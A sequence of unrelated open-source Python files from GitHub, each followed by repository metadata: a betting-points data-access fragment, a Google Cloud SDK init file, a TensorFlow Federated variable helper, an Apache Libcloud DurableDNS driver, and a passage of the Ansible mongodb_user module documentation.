self.points.insert(new_poster)
def computer_accept_call(self, poster_id, point_count, share_count):
old_poster = self.get_points(poster_id)
now = datetime.datetime.utcnow()
if int(float(old_poster["points"])-float(point_count)*float(share_count))>=0:
new_poster= {"user_id": poster_id,
"points": str(int(float(old_poster["points"])-float(point_count)*float(share_count))),
"shares": str(int(float(old_poster["shares"]) + float(share_count))),
"time": now
}
self.points.insert(new_poster)
def computer_accept_put(self, poster_id, point_count, share_count):
old_poster = self.get_points(poster_id)
now = datetime.datetime.utcnow()
if int(float(old_poster["shares"]) - float(share_count)) >= 0:
new_poster= {"user_id": poster_id,
"points": str(int(float(old_poster["points"])+float(point_count)*float(share_count))),
"shares": str(int(float(old_poster["shares"]) - float(share_count))),
"time": now
}
self.points.insert(new_poster)
|
{
"content_hash": "11469e1ae23c324bb9b3001893876723",
"timestamp": "",
"source": "github",
"line_count": 108,
"max_line_length": 111,
"avg_line_length": 40.78703703703704,
"alnum_prop": 0.5595913734392736,
"repo_name": "jac2130/BettingIsBelieving",
"id": "95f8495bd5132401cec24a55fcbfb4d321993605",
"size": "4406",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Betting/pointsDAO.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "559"
},
{
"name": "HTML",
"bytes": "19563"
},
{
"name": "JavaScript",
"bytes": "271785"
},
{
"name": "Python",
"bytes": "94184"
}
],
"symlink_target": ""
}
|
"""Common imports for generated sqladmin client library."""
# pylint:disable=wildcard-import
import pkgutil
from googlecloudsdk.third_party.apitools.base.py import *
from googlecloudsdk.third_party.apis.sqladmin.v1beta3.sqladmin_v1beta3_client import *
from googlecloudsdk.third_party.apis.sqladmin.v1beta3.sqladmin_v1beta3_messages import *
__path__ = pkgutil.extend_path(__path__, __name__)
|
{
"content_hash": "313099edaddf75573fbaccac24b2d54b",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 88,
"avg_line_length": 39.6,
"alnum_prop": 0.7904040404040404,
"repo_name": "flgiordano/netcash",
"id": "8c6f3ec680bf6d72daaf62102f1bca68c1a05b5e",
"size": "396",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "+/google-cloud-sdk/lib/googlecloudsdk/third_party/apis/sqladmin/v1beta3/__init__.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "622"
},
{
"name": "HTML",
"bytes": "33831"
},
{
"name": "JavaScript",
"bytes": "13859"
},
{
"name": "Shell",
"bytes": "2716"
}
],
"symlink_target": ""
}
|
class PymqiException(Exception):
"""
PymqiException is used when there's an issue running pymqi
"""
|
{
"content_hash": "304ec04770f7b4795c4908c1b89937ed",
"timestamp": "",
"source": "github",
"line_count": 4,
"max_line_length": 62,
"avg_line_length": 28,
"alnum_prop": 0.6875,
"repo_name": "DataDog/integrations-core",
"id": "903277d8c14f74f7325ead902710e83751b3994e",
"size": "229",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ibm_mq/datadog_checks/ibm_mq/errors.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "578"
},
{
"name": "COBOL",
"bytes": "12312"
},
{
"name": "Dockerfile",
"bytes": "22998"
},
{
"name": "Erlang",
"bytes": "15518"
},
{
"name": "Go",
"bytes": "6988"
},
{
"name": "HCL",
"bytes": "4080"
},
{
"name": "HTML",
"bytes": "1318"
},
{
"name": "JavaScript",
"bytes": "1817"
},
{
"name": "Kotlin",
"bytes": "430"
},
{
"name": "Lua",
"bytes": "3489"
},
{
"name": "PHP",
"bytes": "20"
},
{
"name": "PowerShell",
"bytes": "2398"
},
{
"name": "Python",
"bytes": "13020828"
},
{
"name": "Roff",
"bytes": "359"
},
{
"name": "Ruby",
"bytes": "241"
},
{
"name": "Scala",
"bytes": "7000"
},
{
"name": "Shell",
"bytes": "83227"
},
{
"name": "Swift",
"bytes": "203"
},
{
"name": "TSQL",
"bytes": "29972"
},
{
"name": "TypeScript",
"bytes": "1019"
}
],
"symlink_target": ""
}
|
"""Library of helper functions for working with TensorFlow `tf.Variable`."""
import contextlib
import operator
import numpy as np
import tensorflow as tf
@contextlib.contextmanager
def record_variable_creation_scope():
"""Creates a single use contextmanager for capture variable creation calls."""
variable_list = []
def logging_variable_creator(next_creator, **kwargs):
variable = next_creator(**kwargs)
variable_list.append(variable)
return variable
with contextlib.ExitStack() as stack:
stack.enter_context(tf.variable_creator_scope(logging_variable_creator))
yield variable_list
class TensorVariable:
"""A class that is duck-typed to `tf.Variable` but only uses `tf.Tensor`.
This class implements the interface contract of `tf.Variable`, for
documentation see http://www.tensorflow.org/api_docs/python/tf/Variable. To
be true to the API sometimes arguments are ignored (e.g. `use_locking`).
This is intended for creating `tff.learning.models.FunctionalModel` and is
*not* compatible with `tf.distribute` strategies.
IMPORTANT: this class behaves as if
`tf.autograph.experimental.Feature.AUTO_CONTROL_DEPS` (ACD) was applied, which
is the same behavior as inside a `tf.function`. This may have surprising
side-effects if code authors were not expecting it, but also is more similar
to standard Python code where the line ordering implies execution ordering.
IMPORTANT: the `name` attribute does not behave the same as `tf.Variable`.
Notably, it does not do name deduplication in graph contexts (no `_#` suffix
is applied), and the returned name string does not refer to the fetchable
resource from a session.
"""
def __init__(self,
initial_value,
dtype=None,
validate_shape=True,
shape=None,
**kwargs):
"""For details see https://www.tensorflow.org/api_docs/python/tf/Variable#args_1."""
if callable(initial_value):
if dtype is None:
raise ValueError('When `initial_value` is a callable, `dtype` must be '
'specified.')
initial_value = initial_value()
if tf.is_tensor(initial_value):
self._initial_value = initial_value
else:
if dtype is not None:
self._initial_value = tf.convert_to_tensor(initial_value, dtype)
else:
self._initial_value = tf.convert_to_tensor(initial_value)
self._tensor = self._initial_value
self._validate_shape = validate_shape
if shape is None:
self._shape = self._initial_value.shape
else:
if not isinstance(shape, tf.TensorShape):
shape = tf.TensorShape(shape)
self._shape = shape
self._check_shape(self._tensor)
self._name = kwargs.get('name', 'Variable')
self._save_slice_info = None
@property
def shape(self) -> tf.TensorShape:
return self._tensor.shape
@property
def dtype(self) -> tf.dtypes.DType:
return self._tensor.dtype
@property
def name(self) -> str:
return self._name
def assign(self, value, use_locking=False, name=None, read_value=True):
del use_locking # Unused.
value = tf.convert_to_tensor(value)
self._check_shape(value)
self._tensor = value
if tf.executing_eagerly() and not read_value:
return None
else:
return tf.identity(self._tensor, name)
def _check_shape(self, value):
if not self._validate_shape:
return
if not self._shape.is_compatible_with(tf.TensorShape(value.shape)):
raise ValueError(
f'Cannot assign value to variable {self!r}. The TensorVariable shape '
f'{self._shape}, and the value shape {value.shape} are incompatible.')
def assign_add(self, value, use_locking=False, name=None, read_value=True):
del use_locking # Unused.
value = tf.convert_to_tensor(value)
self._check_shape(value)
self._tensor = tf.math.add(self._tensor, value, name=name)
if tf.executing_eagerly() and not read_value:
return None
else:
return self._tensor
def assign_sub(self, value, use_locking=False, name=None, read_value=True):
del use_locking # Unused.
value = tf.convert_to_tensor(value)
self._check_shape(value)
self._tensor = tf.math.subtract(self._tensor, value, name=name)
if tf.executing_eagerly() and not read_value:
return None
else:
return self._tensor
def get_shape(self):
return self._tensor.shape
def read_value(self):
return self._tensor
def value(self):
return self._tensor
def ref(self):
return self._tensor.ref()
def __abs__(self):
return operator.__abs__(self._tensor)
def __add__(self, value):
return operator.__add__(self._tensor, value)
def __sub__(self, value):
return operator.__sub__(self._tensor, value)
def __eq__(self, value):
return operator.__eq__(self._tensor, value)
def __ne__(self, value):
return operator.__ne__(self._tensor, value)
def __ge__(self, value):
return operator.__ge__(self._tensor, value)
def __gt__(self, value):
return operator.__gt__(self._tensor, value)
def __le__(self, value):
return operator.__le__(self._tensor, value)
def __lt__(self, value):
return operator.__lt__(self._tensor, value)
def __getitem__(self, slice_spec):
return self._tensor[slice_spec]
def __invert__(self):
return operator.__invert__(self._tensor)
def __mul__(self, value):
return operator.__mul__(self._tensor, value)
def __neg__(self):
return operator.__neg__(self._tensor)
def __truediv__(self, value):
return operator.__truediv__(self._tensor, value)
def __floordiv__(self, value):
return operator.__floordiv__(self._tensor, value)
def __pow__(self, value):
return operator.__pow__(self._tensor, value)
def __hash__(self):
if not tf.executing_eagerly():
return hash(self._tensor)
else:
raise TypeError(f'TensorVariable {self!r} is unhashable. Instead, use '
'tensorvariable.ref() as the key.')
def __repr__(self) -> str:
return f'<TensorVariable: {self._tensor}>'
def __array__(self):
return np.array(self._tensor)
# _save_slice_info is an internal implementation detail of old style
# tf.compat.v1.get_variable() creation and should not generally be used.
def _set_save_slice_info(self, save_slice_info):
self._save_slice_info = save_slice_info
def _get_save_slice_info(self):
return self._save_slice_info
def create_tensor_variable(next_creator_fn, **kwargs):
del next_creator_fn # Unused.
initial_value = kwargs.pop('initial_value')
return TensorVariable(initial_value, **kwargs)
def _convert_tensor_variable_to_tensor(value, *args, **kwargs):
del args # unused
del kwargs # unused
return value.read_value()
tf.register_tensor_conversion_function(TensorVariable,
_convert_tensor_variable_to_tensor)
|
{
"content_hash": "64d79346718d6a1f8696f31ff399ef08",
"timestamp": "",
"source": "github",
"line_count": 223,
"max_line_length": 88,
"avg_line_length": 31.116591928251122,
"alnum_prop": 0.6620550511601095,
"repo_name": "tensorflow/federated",
"id": "641c6e4084971720c8b9f3870bbab560f523884a",
"size": "7538",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "tensorflow_federated/python/tensorflow_libs/variable_utils.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "729470"
},
{
"name": "Dockerfile",
"bytes": "1983"
},
{
"name": "Python",
"bytes": "6700736"
},
{
"name": "Shell",
"bytes": "7123"
},
{
"name": "Starlark",
"bytes": "387382"
}
],
"symlink_target": ""
}
|
"""
DurableDNS Driver
"""
import sys
from libcloud.utils.py3 import httplib
from libcloud.utils.py3 import ensure_string
from libcloud.dns.types import Provider, RecordType
from libcloud.dns.base import Record, Zone
from libcloud.dns.base import DNSDriver
from libcloud.dns.types import ZoneDoesNotExistError, ZoneAlreadyExistsError
from libcloud.dns.types import RecordDoesNotExistError
from xml.etree.ElementTree import tostring
from libcloud.common.durabledns import DurableConnection, DurableResponse
from libcloud.common.durabledns import DurableDNSException
from libcloud.common.durabledns import _schema_builder as api_schema_builder
from libcloud.common.durabledns import SCHEMA_BUILDER_MAP
__all__ = [
'ZONE_EXTRA_PARAMS_DEFAULT_VALUES',
'RECORD_EXTRA_PARAMS_DEFAULT_VALUES',
'DEFAULT_TTL',
'DurableDNSResponse',
'DurableDNSConnection',
'DurableDNSDriver'
]
# This will be the default values for each extra attributes when are not
# specified in the 'extra' parameter
ZONE_EXTRA_PARAMS_DEFAULT_VALUES = {
'ns': 'ns1.durabledns.com.', 'mbox': 'support.durabledns.com',
'refresh': '28800', 'retry': 7200, 'expire': 604800, 'minimum': 82000,
'xfer': '', 'update_acl': ''
}
RECORD_EXTRA_PARAMS_DEFAULT_VALUES = {'aux': 0, 'ttl': 3600}
DEFAULT_TTL = 3600
class DurableDNSResponse(DurableResponse):
pass
class DurableDNSConnection(DurableConnection):
responseCls = DurableDNSResponse
class DurableDNSDriver(DNSDriver):
type = Provider.DURABLEDNS
name = 'DurableDNS'
website = 'https://durabledns.com'
connectionCls = DurableDNSConnection
RECORD_TYPE_MAP = {
RecordType.A: 'A',
RecordType.AAAA: 'AAAA',
RecordType.CNAME: 'CNAME',
RecordType.HINFO: 'HINFO',
RecordType.MX: 'MX',
RecordType.NS: 'NS',
RecordType.PTR: 'PTR',
RecordType.RP: 'RP',
RecordType.SRV: 'SRV',
RecordType.TXT: 'TXT'
}
def list_zones(self):
"""
Return a list of zones.
:return: ``list`` of :class:`Zone`
"""
schema_params = SCHEMA_BUILDER_MAP.get('list_zones')
attributes = schema_params.get('attributes')
schema = api_schema_builder(schema_params.get('urn_nid'),
schema_params.get('method'),
attributes)
params = {'apiuser': self.key, 'apikey': self.secret}
urn = schema.getchildren()[0]
for child in urn:
key = child.tag.split(':')[2]
if key in attributes:
child.text = str(params.get(key))
req_data = tostring(schema)
action = '/services/dns/listZones.php'
params = {}
headers = {"SOAPAction": "urn:listZoneswsdl#listZones"}
response = self.connection.request(action=action, params=params,
data=req_data, method="POST",
headers=headers)
# listZones method doens't return full data in zones as getZone
# method does.
zones = []
for data in response.objects:
zone = self.get_zone(data.get('id'))
zones.append(zone)
return zones
def list_records(self, zone):
"""
Return a list of records for the provided zone.
:param zone: Zone to list records for.
:type zone: :class:`Zone`
:return: ``list`` of :class:`Record`
"""
schema_params = SCHEMA_BUILDER_MAP.get('list_records')
attributes = schema_params.get('attributes')
schema = api_schema_builder(schema_params.get('urn_nid'),
schema_params.get('method'),
attributes)
params = {'apiuser': self.key, 'apikey': self.secret,
'zonename': zone.id}
urn = schema.getchildren()[0]
for child in urn:
key = child.tag.split(':')[2]
if key in attributes:
child.text = str(params.get(key))
req_data = tostring(schema)
action = '/services/dns/listRecords.php?'
params = {}
headers = {"SOAPAction": "urn:listRecordswsdl#listRecords"}
try:
response = self.connection.request(action=action, params=params,
data=req_data, method="POST",
headers=headers)
except DurableDNSException:
e = sys.exc_info()[1]
if 'Zone does not exist' in e.message:
raise ZoneDoesNotExistError(zone_id=zone.id, driver=self,
value=e.message)
raise e
# listRecords method doens't return full data in records as getRecord
# method does.
records = []
for data in response.objects:
record = self.get_record(zone.id, data.get('id'))
records.append(record)
return records
def get_zone(self, zone_id):
"""
Return a Zone instance.
:param zone_id: ID of the required zone
:type zone_id: ``str``
:rtype: :class:`Zone`
"""
schema_params = SCHEMA_BUILDER_MAP.get('get_zone')
attributes = schema_params.get('attributes')
schema = api_schema_builder(schema_params.get('urn_nid'),
schema_params.get('method'),
attributes)
params = {'apiuser': self.key, 'apikey': self.secret,
'zonename': zone_id}
urn = schema.getchildren()[0]
for child in urn:
key = child.tag.split(':')[2]
if key in attributes:
child.text = str(params.get(key))
req_data = tostring(schema)
action = '/services/dns/getZone.php?'
params = {}
headers = {"SOAPAction": "urn:getZonewsdl#getZone"}
try:
response = self.connection.request(action=action, params=params,
data=req_data, method="POST",
headers=headers)
except DurableDNSException:
e = sys.exc_info()[1]
if 'Zone does not exist' in e.message:
raise ZoneDoesNotExistError(zone_id=zone_id, driver=self,
value=e.message)
raise e
zones = self._to_zones(response.objects)
return zones[0]
def get_record(self, zone_id, record_id):
"""
Return a Record instance.
:param zone_id: ID of the required zone
:type zone_id: ``str``
:param record_id: ID of the required record
:type record_id: ``str``
:rtype: :class:`Record`
"""
schema_params = SCHEMA_BUILDER_MAP.get('get_record')
attributes = schema_params.get('attributes')
schema = api_schema_builder(schema_params.get('urn_nid'),
schema_params.get('method'),
attributes)
params = {'apiuser': self.key, 'apikey': self.secret,
'zonename': zone_id, 'recordid': record_id}
urn = schema.getchildren()[0]
for child in urn:
key = child.tag.split(':')[2]
if key in attributes:
child.text = str(params.get(key))
req_data = tostring(schema)
action = '/services/dns/getRecord.php?'
params = {}
headers = {"SOAPAction": "urn:getRecordwsdl#getRecord"}
try:
response = self.connection.request(action=action, params=params,
data=req_data, method="POST",
headers=headers)
except DurableDNSException:
e = sys.exc_info()[1]
if 'Zone does not exist' in e.message:
raise ZoneDoesNotExistError(zone_id=zone_id, driver=self,
value=e.message)
if 'Record does not exist' in e.message:
raise RecordDoesNotExistError(record_id=record_id, driver=self,
value=e.message)
raise e
zone = self.get_zone(zone_id)
record = self._to_record(response.objects[0], zone)
return record
def create_zone(self, domain, type='master', ttl=None, extra=None):
"""
Create a new zone.
:param domain: Name of zone, followed by a dot (.) (e.g. example.com.)
:type domain: ``str``
:param type: Zone type (Only master available). (optional)
:type type: ``str``
:param ttl: TTL for new records. (optional)
:type ttl: ``int``
:param extra: Extra attributes ('mbox', 'ns', 'minimum', 'refresh',
'expire', 'update_acl', 'xfer').
(optional)
:type extra: ``dict``
:rtype: :class:`Zone`
"""
if extra is None:
extra = ZONE_EXTRA_PARAMS_DEFAULT_VALUES
else:
extra_fields = ZONE_EXTRA_PARAMS_DEFAULT_VALUES.keys()
missing = set(extra_fields).difference(set(extra.keys()))
for field in missing:
extra[field] = ZONE_EXTRA_PARAMS_DEFAULT_VALUES.get(field)
schema_params = SCHEMA_BUILDER_MAP.get('create_zone')
attributes = schema_params.get('attributes')
schema = api_schema_builder(schema_params.get('urn_nid'),
schema_params.get('method'),
attributes)
params = {'apiuser': self.key, 'apikey': self.secret,
'zonename': domain, 'ttl': ttl or DEFAULT_TTL}
params.update(extra)
urn = schema.getchildren()[0]
for child in urn:
key = child.tag.split(':')[2]
if key in attributes:
if isinstance(params.get(key), int):
child.text = "%d"
else:
child.text = "%s"
# We can't insert values directly in child.text because API raises
# and exception for values that need to be integers. And tostring
# method from ElementTree can't handle int values.
skel = ensure_string(tostring(schema)) # Deal with PY3
req_data = skel % (self.key, self.secret, domain, extra.get('ns'),
extra.get('mbox'), extra.get('refresh'),
extra.get('retry'), extra.get('expire'),
extra.get('minimum'), ttl or DEFAULT_TTL,
extra.get('xfer'), extra.get('update_acl'))
action = '/services/dns/createZone.php?'
params = {}
headers = {"SOAPAction": "urn:createZonewsdl#createZone"}
try:
self.connection.request(action=action, params=params,
data=req_data, method="POST",
headers=headers)
except DurableDNSException:
e = sys.exc_info()[1]
if 'Zone Already Exist' in e.message:
raise ZoneAlreadyExistsError(zone_id=domain, driver=self,
value=e.message)
raise e
zone = self.get_zone(domain)
return zone
def create_record(self, name, zone, type, data, extra=None):
"""
Create a new record.
:param name: Record name without the domain name (e.g. www).
Note: If you want to create a record for a base domain
name, you should specify empty string ('') for this
argument.
:type name: ``str``
:param zone: Zone where the requested record is created.
:type zone: :class:`Zone`
:param type: DNS record type (A, AAAA, ...).
:type type: :class:`RecordType`
:param data: Data for the record (depends on the record type).
:type data: ``str``
:param extra: Extra attributes (e.g. 'aux', 'ttl'). (optional)
:type extra: ``dict``
:rtype: :class:`Record`
"""
if extra is None:
extra = RECORD_EXTRA_PARAMS_DEFAULT_VALUES
else:
if 'aux' not in extra:
extra['aux'] = RECORD_EXTRA_PARAMS_DEFAULT_VALUES.get('aux')
if 'ttl' not in extra:
extra['ttl'] = RECORD_EXTRA_PARAMS_DEFAULT_VALUES.get('ttl')
extra['ddns_enabled'] = 'N'
schema_params = SCHEMA_BUILDER_MAP.get('create_record')
attributes = schema_params.get('attributes')
schema = api_schema_builder(schema_params.get('urn_nid'),
schema_params.get('method'),
attributes)
params = {'apiuser': self.key, 'apikey': self.secret,
'zonename': zone.id, 'name': name, 'type': type,
'data': data}
params.update(extra)
urn = schema.getchildren()[0]
for child in urn:
key = child.tag.split(':')[2]
if key in attributes:
if isinstance(params.get(key), int):
child.text = "%d"
else:
child.text = "%s"
# We can't insert values directly in child.text because API raises
# and exception for values that need to be integers. And tostring
# method from ElementTree can't handle int values.
skel = ensure_string(tostring(schema)) # Deal with PY3
req_data = skel % (self.key, self.secret, zone.id, name, type, data,
extra.get('aux'), extra.get('ttl'),
extra.get('ddns_enabled'))
action = '/services/dns/createRecord.php?'
headers = {"SOAPAction": "urn:createRecordwsdl#createRecord"}
try:
response = self.connection.request(action=action, data=req_data,
method="POST", headers=headers)
objects = response.objects
except DurableDNSException:
e = sys.exc_info()[1]
# In DurableDNS is possible to create records with same data.
# Their ID's will be different but the API does not implement
# the RecordAlreadyExist exception. Only ZoneDoesNotExist will
# be handled.
if 'Zone does not exist' in e.message:
raise ZoneDoesNotExistError(zone_id=zone.id, driver=self,
value=e.message)
raise e
record_item = objects[0]
record_item['name'] = name
record_item['type'] = type
record_item['data'] = data
record_item['ttl'] = extra.get('ttl')
record_item['aux'] = extra.get('aux')
record = self._to_record(record_item, zone)
return record
def update_zone(self, zone, domain, type='master', ttl=None, extra=None):
"""
Update en existing zone.
:param zone: Zone to update.
:type zone: :class:`Zone`
:param domain: Name of zone, followed by a dot (.) (e.g. example.com.)
:type domain: ``str``
:param type: Zone type (master / slave).
:type type: ``str``
:param ttl: TTL for new records. (optional)
:type ttl: ``int``
:param extra: Extra attributes ('ns', 'mbox', 'refresh', 'retry',
'expire', 'minimum', 'xfer', 'update_acl'). (optional)
:type extra: ``dict``
:rtype: :class:`Zone`
"""
if ttl is None:
ttl = zone.ttl
if extra is None:
extra = zone.extra
else:
extra_fields = ZONE_EXTRA_PARAMS_DEFAULT_VALUES.keys()
missing = set(extra_fields).difference(set(extra.keys()))
for field in missing:
extra[field] = zone.extra.get(field)
schema_params = SCHEMA_BUILDER_MAP.get('update_zone')
attributes = schema_params.get('attributes')
schema = api_schema_builder(schema_params.get('urn_nid'),
schema_params.get('method'),
attributes)
params = {'apiuser': self.key, 'apikey': self.secret,
'zonename': domain, 'ttl': ttl}
params.update(extra)
urn = schema.getchildren()[0]
for child in urn:
key = child.tag.split(':')[2]
if key in attributes:
if isinstance(params.get(key), int):
child.text = "%d"
else:
child.text = "%s"
# We can't insert values directly in child.text because API raises
# and exception for values that need to be integers. And tostring
# method from ElementTree can't handle int values.
skel = ensure_string(tostring(schema)) # Deal with PY3
req_data = skel % (self.key, self.secret, domain, extra['ns'],
extra['mbox'], extra['refresh'], extra['retry'],
extra['expire'], extra['minimum'], ttl,
extra['xfer'], extra['update_acl'])
action = '/services/dns/updateZone.php?'
headers = {"SOAPAction": "urn:updateZonewsdl#updateZone"}
try:
self.connection.request(action=action,
data=req_data,
method="POST",
headers=headers)
except DurableDNSException:
e = sys.exc_info()[1]
if 'Zone does not exist' in e.message:
raise ZoneDoesNotExistError(zone_id=zone.id, driver=self,
value=e.message)
raise e
# After update the zone, serial number change. In order to have it
# updated, we need to get again the zone data.
zone = self.get_zone(zone.id)
return zone
def update_record(self, record, name, type, data, extra=None):
"""
Update an existing record.
:param record: Record to update.
:type record: :class:`Record`
:param name: Record name without the domain name (e.g. www).
Note: If you want to create a record for a base domain
name, you should specify empty string ('') for this
argument.
:type name: ``str``
:param type: DNS record type (A, AAAA, ...).
:type type: :class:`RecordType`
:param data: Data for the record (depends on the record type).
:type data: ``str``
:param extra: (optional) Extra attributes (driver specific).
:type extra: ``dict``
:rtype: :class:`Record`
"""
zone = record.zone
if extra is None:
extra = record.extra
else:
extra_fields = ['aux', 'ttl']
missing = set(extra_fields).difference(set(extra.keys()))
for field in missing:
extra[field] = record.extra.get(field)
extra['ddns_enabled'] = 'N'
schema_params = SCHEMA_BUILDER_MAP.get('update_record')
attributes = schema_params.get('attributes')
schema = api_schema_builder(schema_params.get('urn_nid'),
schema_params.get('method'),
attributes)
params = {'apiuser': self.key, 'apikey': self.secret,
'zonename': zone.id, 'id': record.id, 'name': name,
'data': data}
params.update(extra)
urn = schema.getchildren()[0]
for child in urn:
key = child.tag.split(':')[2]
if key in attributes:
if isinstance(params.get(key), int):
child.text = "%d"
else:
child.text = "%s"
# We can't insert values directly in child.text because API raises
# and exception for values that need to be integers. And tostring
# method from ElementTree can't handle int values.
skel = ensure_string(tostring(schema)) # Deal with PY3
req_data = skel % (self.key, self.secret, zone.id, record.id, name,
extra.get('aux'), data, extra.get('ttl'),
extra.get('ddns_enabled'))
action = '/services/dns/updateRecord.php?'
headers = {"SOAPAction": "urn:updateRecordwsdl#updateRecord"}
try:
self.connection.request(action=action,
data=req_data,
method="POST",
headers=headers)
except DurableDNSException:
e = sys.exc_info()[1]
if 'Zone does not exist' in e.message:
raise ZoneDoesNotExistError(zone_id=zone.id, driver=self,
value=e.message)
raise e
record_item = {}
record_item['id'] = record.id
record_item['name'] = name
record_item['type'] = type
record_item['data'] = data
record_item['ttl'] = extra.get('ttl')
record_item['aux'] = extra.get('aux')
record = self._to_record(record_item, zone)
return record
def delete_zone(self, zone):
"""
Delete a zone.
Note: This will delete all the records belonging to this zone.
:param zone: Zone to delete.
:type zone: :class:`Zone`
:rtype: ``bool``
"""
schema_params = SCHEMA_BUILDER_MAP.get('delete_zone')
attributes = schema_params.get('attributes')
schema = api_schema_builder(schema_params.get('urn_nid'),
schema_params.get('method'),
attributes)
params = {'apiuser': self.key, 'apikey': self.secret,
'zonename': zone.id}
urn = schema.getchildren()[0]
for child in urn:
key = child.tag.split(':')[2]
if key in attributes:
child.text = str(params.get(key))
req_data = tostring(schema)
action = '/services/dns/deleteZone.php?'
headers = {"SOAPAction": "urn:deleteZonewsdl#deleteZone"}
try:
response = self.connection.request(action=action,
data=req_data, method="POST",
headers=headers)
except DurableDNSException:
e = sys.exc_info()[1]
if 'Zone does not exist' in e.message:
raise ZoneDoesNotExistError(zone_id=zone.id, driver=self,
value=e.message)
raise e
return response.status in [httplib.OK]
def delete_record(self, record):
"""
Delete a record.
:param record: Record to delete.
:type record: :class:`Record`
:rtype: ``bool``
"""
schema_params = SCHEMA_BUILDER_MAP.get('delete_record')
attributes = schema_params.get('attributes')
schema = api_schema_builder(schema_params.get('urn_nid'),
schema_params.get('method'),
attributes)
params = {'apiuser': self.key, 'apikey': self.secret,
'zonename': record.zone.id, 'id': record.id}
urn = schema.getchildren()[0]
for child in urn:
key = child.tag.split(':')[2]
if key in attributes:
child.text = str(params.get(key))
req_data = tostring(schema)
action = '/services/dns/deleteRecord.php?'
headers = {"SOAPAction": "urn:deleteRecordwsdl#deleteRecord"}
try:
response = self.connection.request(action=action, data=req_data,
headers=headers, method="POST")
except DurableDNSException:
e = sys.exc_info()[1]
if 'Record does not exists' in e.message:
raise RecordDoesNotExistError(record_id=record.id, driver=self,
value=e.message)
if 'Zone does not exist' in e.message:
raise ZoneDoesNotExistError(zone_id=record.zone.id,
driver=self, value=e.message)
raise e
return response.status in [httplib.OK]
def _to_zone(self, item):
extra = item.get('extra')
# DurableDNS does not return information about zone type. This will be
# set as master by default.
zone = Zone(id=item.get('id'), type='master', domain=item.get('id'),
ttl=item.get('ttl'), driver=self, extra=extra)
return zone
def _to_zones(self, items):
zones = []
for item in items:
zones.append(self._to_zone(item))
return zones
def _to_record(self, item, zone=None):
extra = {'aux': int(item.get('aux')), 'ttl': int(item.get('ttl'))}
record = Record(id=item.get('id'), type=item.get('type'), zone=zone,
name=item.get('name'), data=item.get('data'),
driver=self, ttl=item.get('ttl', None), extra=extra)
return record
def _to_records(self, items, zone=None):
records = []
for item in items:
records.append(self._to_record(item, zone))
return records
|
{
"content_hash": "9b528a2d8166fda87ca97184106d06c4",
"timestamp": "",
"source": "github",
"line_count": 646,
"max_line_length": 79,
"avg_line_length": 39.907120743034056,
"alnum_prop": 0.5264158262218774,
"repo_name": "wido/libcloud",
"id": "5d2fbe81d1af26fb4d4d665394f5932bc94392ac",
"size": "26561",
"binary": false,
"copies": "4",
"ref": "refs/heads/trunk",
"path": "libcloud/dns/drivers/durabledns.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "2545"
},
{
"name": "Python",
"bytes": "4512215"
},
{
"name": "Shell",
"bytes": "13868"
}
],
"symlink_target": ""
}
|
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'version': '1.0'}
DOCUMENTATION = '''
---
module: mongodb_user
short_description: Adds or removes a user from a MongoDB database.
description:
- Adds or removes a user from a MongoDB database.
version_added: "1.1"
options:
login_user:
description:
- The username used to authenticate with
required: false
default: null
login_password:
description:
- The password used to authenticate with
required: false
default: null
login_host:
description:
- The host running the database
required: false
default: localhost
login_port:
description:
- The port to connect to
required: false
default: 27017
login_database:
version_added: "2.0"
description:
- The database where login credentials are stored
required: false
default: null
replica_set:
version_added: "1.6"
description:
- Replica set to connect to (automatically connects to primary for writes)
required: false
default: null
database:
description:
- The name of the database to add/remove the user from
required: true
name:
description:
- The name of the user to add or remove
required: true
default: null
aliases: [ 'user' ]
password:
description:
- The password to use for the user
required: false
default: null
ssl:
version_added: "1.8"
description:
- Whether to use an SSL connection when connecting to the database
default: False
ssl_cert_reqs:
version_added: "2.2"
description:
- Specifies whether a certificate is required from the other side of the connection, and whether it will be validated if provided.
required: false
default: "CERT_REQUIRED"
choices: ["CERT_REQUIRED", "CERT_OPTIONAL", "CERT_NONE"]
roles:
version_added: "1.3"
description:
- "The database user roles valid values could either be one or more of the following strings: 'read', 'readWrite', 'dbAdmin', 'userAdmin', 'clusterAdmin', 'readAnyDatabase', 'readWriteAnyDatabase', 'userAdminAnyDatabase', 'dbAdminAnyDatabase'"
- "Or the following dictionary '{ db: DATABASE_NAME, role: ROLE_NAME }'."
- "This param requires pymongo 2.5+. If it is a string, mongodb 2.4+ is also required. If it is a dictionary, mongo 2.6+ is required."
required: false
default: "readWrite"
state:
state:
description:
- The database user state
required: false
default: present
choices: [ "present", "absent" ]
update_password:
required: false
default: always
choices: ['always', 'on_create']
version_added: "2.1"
description:
- C(always) will update passwords if they differ. C(on_create) will only set the password for newly created users.
notes:
- Requires the pymongo Python package on the remote host, version 2.4.2+. This
can be installed using pip or the OS package manager. @see http://api.mongodb.org/python/current/installation.html
requirements: [ "pymongo" ]
author: "Elliott Foster (@elliotttf)"
'''
EXAMPLES = '''
# Create 'burgers' database user with name 'bob' and password '12345'.
- mongodb_user:
database: burgers
name: bob
password: 12345
state: present
# Create a database user via SSL (MongoDB must be compiled with the SSL option and configured properly)
- mongodb_user:
database: burgers
name: bob
password: 12345
state: present
ssl: True
# Delete 'burgers' database user with name 'bob'.
- mongodb_user:
database: burgers
name: bob
state: absent
# Define more users with various specific roles (if not defined, no roles is assigned, and the user will be added via pre mongo 2.2 style)
- mongodb_user:
database: burgers
name: ben
password: 12345
roles: read
state: present
- mongodb_user:
database: burgers
name: jim
password: 12345
roles: readWrite,dbAdmin,userAdmin
state: present
- mongodb_user:
database: burgers
name: joe
password: 12345
roles: readWriteAnyDatabase
state: present
# add a user to database in a replica set, the primary server is automatically discovered and written to
- mongodb_user:
database: burgers
name: bob
replica_set: belcher
password: 12345
